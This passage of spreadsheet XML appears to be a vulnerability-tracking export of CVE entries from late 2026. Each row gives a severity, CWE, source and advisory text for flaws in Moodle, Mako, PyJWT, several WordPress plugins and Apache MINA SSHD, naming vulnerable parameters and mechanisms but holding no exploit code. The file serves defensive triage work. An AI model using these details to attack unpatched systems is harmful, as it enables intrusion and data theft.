        <v>6.5</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. The XML grade import feature lacks proper Cross-Site Request Forgery (CSRF) token validation. By tricking an authenticated user with grade management permissions into visiting a malicious webpage, an attacker can trigger unauthorized requests on the victim's behalf. This flaw allows a remote attacker to set or overwrite student grades without authorization.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102588</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102991</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>express, python, gin</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>Mako is a template library written in Python. Prior to 1.4.2, on Windows, TemplateLookup.get_template() in mako/lookup.py resolves template URIs with posixpath, while Template.__init__() in mako/template.py validates them with os.path, which uses ntpath. A URI beginning with a drive designator causes ntpath to absorb the traversal segments before the leading dot-dot check, while posixpath resolution can escape the configured template directory. An application that passes attacker-controlled template names or include paths can disclose process-readable files on the same volume, and a targeted file containing Mako template syntax may also be parsed and executed as a template. Raw URL paths are generally normalized before reaching this form, but query strings, form or JSON bodies, route parameters, and dynamic include expressions can preserve it. This issue is fixed in version 1.4.2.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102991</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103001</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr">
        <is>
          <t>pip:PyJWT</t>
        </is>
      </c>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-471</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.11.0 through 2.13.0, PyJWT's PyJWT._merge_options() method can modify a caller-supplied mutable options mapping when verify_signature is false. If an application reuses that same mapping for a later decode() or decode_complete() call and changes verify_signature to true, the mapping can retain false values for expiration, not-before, issued-at, audience, issuer, subject, and JWT ID checks. A signed token with invalid registered claims can then be accepted without disabling signature verification, but applications that create a fresh options mapping for each call are not affected.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103001</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103538</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in ZongXR SuperMarket 1.0.0.0. Affected by this issue is the function OrderController.deleteOrder of the file order/src/main/java/com/supermarket/order/controller/OrderController.java of the component Order Deletion Endpoint. Performing a manipulation of the argument orderId results in missing authentication. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103538</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103592</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>simple-php-router through 5.4.1.7 contains an IP restriction bypass vulnerability in the IpRestrictAccess middleware that allows remote unauthenticated attackers to bypass IP whitelist and blacklist protections. Attackers can spoof X-Forwarded-For, CF-Connecting-IP, or Client-IP headers to impersonate whitelisted addresses or evade blacklists, gaining access to IP-restricted routes.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103592</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16596</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>The WP Directory Kit plugin for WordPress is vulnerable to generic SQL Injection via the 'data_fields_list' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16596</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62078</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Premium Addons for Elementor &lt;= 4.11.105 versions.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62078</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62079</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Qi Addons For Elementor &lt;= 1.11 versions.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62079</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62080</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Happy Addons for Elementor &lt;= 3.23.1 versions.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62080</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62084</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeff Starr User Submitted Posts allows Stored XSS.
This issue affects User Submitted Posts: from n/a through 20260810.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62084</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67075</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>psirt@hcl.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>HCL Digital Experience is affected by improper input sanitation.  This can result in HTML injection which could be leveraged in content spoofing from a trusted domain. Apply HCL Digital Experience 9.5 CF238 or later to address this.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67075</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91109</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.12.31 via the 'complete_group' parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to disclose every co-booker's private per-appointment id_token (exposed as public_token) alongside their PII (name and email address), then use each leaked token to read, overwrite arbitrary appointment meta on, or cancel the co-booker's appointment via the same REST controller. Exploitation requires the attacker to possess a valid id_token for any single appointment within the targeted group booking.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91109</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93995</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in sshd-git in Apache MINA SSHD, versions up to 2.19.0 and 3.0.0-M1 to 3.0.0-M5. Apache 
MINA SSHD is a Java library for client-side and server-side SSH.
Component org.apache.sshd:sshd-git provides though class GitPgmCommandFactory a way to configure an Apache MINA SSHD server such 
that authenticated SSH clients can remotely execute git commands via the JGit library 
on git repositories stored on the server. In CVE-2026-58624 this mechanism was restricted to only a few git commands, including "git archive" without "--output" or "-o" options such that the resulting archive would not be written on the server but instead sent back to the client over the SSH connection.
The fix done for CVE-2026-58624 was insufficient as it missed removing the single-argument "-o=file.zip" version of the command parameter from the "archive" command.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93995</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93996</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled resource consumption in component ssd-scp in Apache MINA SSHD versions up to 2.19.0 or 3.0.0-M1 to 3.0.0-M5. Apache MINA SSHD is a Java library for client-side and server-side SSH.
Component sshd-scp of Apache MINA SSHD provides a Java implementation of SCP. The SCP command protocol is line-oriented with LF-terminated lines. The protocol handler in sshd-scp did not impose any limit on the length of such protocol lines. A malicious peer just sending a junk command containing a never-ending sequence of characters but never a LF would cause the receiver to allocate memory to store this whole junk command, exhausting memory and crashing the application with an OutOfMemoryError.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue by enforcing an upper limit on the length of SCP protocol lines.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93996</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94029</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Server-side memory exhaustion in Apache MINA SSHD 1.0.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5, component sshd-sftp, in the SFTP v6 check-file-name/check-file-handle extension. Apache MINA SSHD is a Java library for client-side and server-side SSH.
Using a very small "block size" (for instance 256, which is the minimum) on a huge file generates many (file size / block size) hashes. The resulting SFTP reply message was accumulated fully in memory server-side, which could, with a suitably large (possibly sparse) file exhaust the server-side memory, taking down the server.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue by imposing a maximum limit on the size of the reply. Many SFTP implementations have a general limit on the size of SFTP messages anyway; typically 256kB as in OpenSSH or also in Apache MINA SSHD.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94029</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94074</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
